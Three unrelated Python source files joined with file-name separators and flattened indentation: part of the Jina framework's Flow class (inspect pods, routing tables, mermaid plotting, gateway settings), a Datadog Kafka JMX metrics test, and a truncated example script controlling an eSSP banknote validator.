Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
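# Usage sketch for inspect() (hedged: 'MyExec' and 'MyEvaluator' are hypothetical):
#     Flow().add(uses='MyExec').inspect(uses='MyEvaluator')
# attaches an InspectPod that taps the output of the last Pod, plus an auxiliary pass-through Pod,
# so the main data path keeps its original socket types.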
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket: https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
for deployment in pod.deployments:
graph.add_pod(
deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if end not in graph.pods:
end = end + '_head'
for start in pod.needs:
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if start not in graph.pods:
start = start + '_tail'
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
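# Summary of the routing graph built above: the gateway is split into two pseudo-pods,
# 'start-gateway' (source) and 'end-gateway' (sink); every other deployment becomes a node and one
# edge is added per `needs` relation. When connect_to_predecessor is set or the hop is a
# remote-to-local connection, the edge is flagged and the receiving Pod's head is told to connect
# out to the sender's tail address. For sharded Pods, the head and tail deployments are
# additionally wired to every shard in between.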
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told do so
elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
self._pod_nodes[pod].update_pea_args()
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify in place
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.unsetenv(k)
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
v.args.noblock_on_start = True
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self) -> bool:
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(target=self._get_address_table, args=(addr_table,))
t_ip.start()
for t in threads:
t.join()
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
                f'Flow is aborted because {error_pods} could not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
self.logger.info('🎉 Kubernetes Flow is ready to use!')
else:
self.logger.info('🎉 Flow is ready to use!')
if addr_table:
self.logger.info('\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (parallel count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Equality is defined by whether the two Flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
"%%{init: {'theme': 'base', "
"'themeVariables': { 'primaryColor': '#32C8CD', "
"'edgeLabelBackground':'#fff', 'clusterBkg': '#FFCC66'}}}%%",
'graph LR',
]
start_repl = {}
end_repl = {}
for node, v in self._pod_nodes.items():
if not v.is_singleton and v.role != PodRoleType.GATEWAY:
if v.args.replicas == 1:
mermaid_graph.append(
f'subgraph sub_{node} ["{node} ({v.args.parallel})"]'
)
else:
mermaid_graph.append(
f'subgraph sub_{node} ["{node} ({v.args.replicas})({v.args.parallel})"]'
)
if v.is_head_router:
head_router = node + '_HEAD'
end_repl[node] = (head_router, '((fa:fa-random))')
if v.is_tail_router:
tail_router = node + '_TAIL'
start_repl[node] = (tail_router, '((fa:fa-random))')
for i in range(v.args.replicas):
if v.is_head_router:
head_replica_router = node + f'_{i}_HEAD'
if v.args.replicas == 1:
end_repl[node] = (head_replica_router, '((fa:fa-random))')
if v.is_tail_router:
tail_replica_router = node + f'_{i}_TAIL'
if v.args.replicas == 1:
start_repl[node] = (tail_replica_router, '((fa:fa-random))')
p_r = '((%s))'
p_e = '[[%s]]'
if v.args.replicas > 1:
mermaid_graph.append(
f'\t{head_router}{p_r % "head"}:::pea-->{head_replica_router}{p_e % "replica_head"}:::pea'
)
mermaid_graph.append(
f'\t{tail_replica_router}{p_r % "replica_tail"}:::pea-->{tail_router}{p_e % "tail"}:::pea'
)
for j in range(v.args.parallel):
r = v.args.uses
if v.args.replicas > 1:
r += f'_{i}_{j}'
elif v.args.parallel > 1:
r += f'_{j}'
if v.is_head_router:
mermaid_graph.append(
f'\t{head_replica_router}{p_r % "head"}:::pea-->{r}{p_e % r}:::pea'
)
if v.is_tail_router:
mermaid_graph.append(
f'\t{r}{p_e % r}:::pea-->{tail_replica_router}{p_r % "tail"}:::pea'
)
mermaid_graph.append('end')
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
_s = start_repl.get(
need, (need, f'("{need}<br>({self._pod_nodes[need].args.uses})")')
)
_e = end_repl.get(node, (node, f'("{node}<br>({v.args.uses})")'))
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
line_st = '-->'
if _s_role in {PodRoleType.INSPECT, PodRoleType.JOIN_INSPECT}:
_s = start_repl.get(need, (need, f'{{{{{need}}}}}'))
elif _s_role == PodRoleType.GATEWAY:
_s = start_repl.get(need, (need, f'("{need}")'))
if _e_role == PodRoleType.GATEWAY:
_e = ('gateway_END', f'({node})')
elif _e_role in {PodRoleType.INSPECT, PodRoleType.JOIN_INSPECT}:
_e = end_repl.get(node, (node, f'{{{{{node}}}}}'))
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{_s[0]}{_s[1]}:::{str(_s_role)} {line_st} {_e[0]}{_e[1]}:::{str(_e_role)}'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.POD)} fill:#32C8CD,stroke:#009999'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT)} fill:#ff6666,color:#fff'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.JOIN_INSPECT)} fill:#ff6666,color:#fff'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:#6E7278,color:#fff'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} fill:#fff,color:#000,stroke-dasharray: 5 5'
)
mermaid_graph.append('classDef pea fill:#009999,stroke:#1E6E73')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
        If a file name is provided, an image with that name will be created;
        otherwise the URL for mermaid will be displayed.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
        :param build: build the Flow before plotting so the gateway connection can be shown more accurately
        :param copy_flow: when set to True, always copy the current Flow, apply the modification
            on the copy and return it; otherwise, modify the Flow in place
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('graph LR', 'graph TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
        Render the current Flow as a URL that points to an SVG. It needs an internet connection.
        :param mermaid_str: the mermaid representation
        :param img_type: image type (svg/jpg)
        :return: the URL that points to the rendered image
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
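        # e.g. img_type='svg' yields 'https://mermaid.ink/svg/<base64-encoded mermaid graph>'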
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
        :param value: the new host of the Flow
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(self):
"""Block the process until user hits KeyboardInterrupt"""
try:
threading.Event().wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
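    # Indexing sketch: flow['pod_name'] looks a Pod up by name, flow[0] by insertion
    # order; any other key type raises TypeError (see the branches above).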
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'replicas_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "replicas_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
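        # Usage sketch (the endpoint name is illustrative only):
        #   f.expose_endpoint('/foo', summary='my endpoint')
        #   # once the Flow is started, POST http://<host>:<port_expose>/foo reaches
        #   # the Executor method decorated with @requests(on='/foo')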
# for backward support
join = needs
def rolling_update(self, pod_name: str, dump_path: Optional[str] = None):
"""
Reload Pods sequentially - only used for compound pods.
:param dump_path: the path from which to read the dump data
:param pod_name: pod to update
"""
        # TODO: By design, after the Flow object has started, the Flow shouldn't have in-memory access to its sub-objects anymore.
        # All control should be issued via network requests, not via direct memory access.
        # In the current master, Flow.rolling_update() & Flow.dump() bypass the above design,
        # which makes the whole system NOT cloud-native.
warnings.warn(
'This function is experimental and facing potential refactoring',
FutureWarning,
)
compound_pod = self._pod_nodes[pod_name]
if isinstance(compound_pod, CompoundPod):
compound_pod.rolling_update(dump_path)
else:
raise ValueError(
f'The BasePod {pod_name} is not a CompoundPod and does not support updating'
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
        kwargs = copy.deepcopy(self._common_kwargs)
        if 'port_expose' in kwargs:
            kwargs['port'] = kwargs['port_expose']
        return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
test_kafka.py
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
log = logging.getLogger('kafka_test')
STATSD_PORT = 8121
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/tmp/collector.log',
'forwarder_log_file': '/tmp/forwarder.log',
'dogstatsd_log_file': '/tmp/dogstatsd.log',
'jmxfetch_log_file': '/tmp/datadog/jmxfetch.log',
'go-metro_log_file': '/tmp/datadog/go-metro.log',
}
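# The logging config is patched before importing jmxfetch/stsstatsd, presumably because
# those modules read the logging configuration at import time; LOG_INFO above supplies
# the minimal settings they expect.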
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from jmxfetch import JMXFetch
from stsstatsd import Server
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='kafka')
class TestKafka(unittest.TestCase):
"""Basic Test for kafka integration."""
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci/resources/')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
# expected_tags = ['env:test', 'instance:kafka-172.17.0.1-9999', 'kafka:broker']
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info(metrics)
log.info(len(metrics))
self.assertTrue(
len([t for t in metrics if "jvm." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) >= 13, metrics)
self.assertTrue(
len([t for t in metrics if "kafka.request." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) == 12, metrics)
self.assertTrue(
len([t for t in metrics if "kafka.replication." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) == 6, metrics)
# CLIENT metrics.
# kafka.producer.request_latency_avg
self.assertTrue(
len([t for t in metrics if "kafka.producer." in t['metric'] and "instance:kafka-172.17.0.1-7777" in t['tags']]) == 1, metrics)
# kafka.consumer.fetch_rate, kafka.consumer.max_lag
self.assertTrue(
len([t for t in metrics if "kafka.consumer." in t['metric'] and "instance:kafka-172.17.0.1-7777" in t['tags']]) == 2, metrics)
# self.assertTrue(
# len([t for t in metrics if "kafka.follower." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) > 40, metrics)
# self.assertTrue(
# len([t for t in metrics if "kafka.net." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) > 40, metrics)
# self.assertTrue(
# len([t for t in metrics if "kafka.messages_in" in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) > 40, metrics)
|
ex1.py
|
import threading
from eSSP.constants import Status
from eSSP import eSSP # Import the library
from time import sleep
# Create a new object ( Validator Object ) and initialize it ( In debug mode, so it will print debug infos )
validator = eSSP(com_port="/dev/ttyUSB0", ssp_address="0", nv11=False, debug=True)
def event_loop():
while True:
# ---- Example of interaction with events ---- #
        if validator.nv11:  # If the model is an NV11, put every 100 note into storage and the others into the stack (cashbox); this is just for this example
            (note, currency, event) = validator.get_last_event()
if note == 0 or currency == 0 or event == 0:
                pass  # Operations that don't carry money info; we don't do anything with them
else:
if note != 4 and event == Status.SSP_POLL_CREDIT:
validator.print_debug("NOT A 100 NOTE")
validator.nv11_stack_next_note()
validator.enable_validator()
elif note == 4 and event == Status.SSP_POLL_READ:
validator.print_debug("100 NOTE")
validator.set_route_storage(100) # Route to storage
validator.do_actions()
validator.set_route_cashbox(50) # Everything under or equal to 50 to cashbox ( NV11 )
sleep(0.5)
t1 = threading.Thread(target=event_loop) # Create a new thread on the Validator System Loop ( needed for the signal )
t1.daemon = True  # Make the thread a daemon because it doesn't catch KeyboardInterrupt, so it will stop when the main thread exits
t1.start() # Start the validator system loop thread ( Needed for starting sending action )
try: # Command Interpreter
while True:
choice = input("")
if choice == "p": # Payout "choice" value bill ( 10, 20, 50, 100, etc. )
choice = input("")
validator.payout(int(choice))
elif choice == "s": # Route to cashbox ( In NV11, it is any amount <= than "choice" )
choice = input("")
validator.set_route_storage(int(choice))
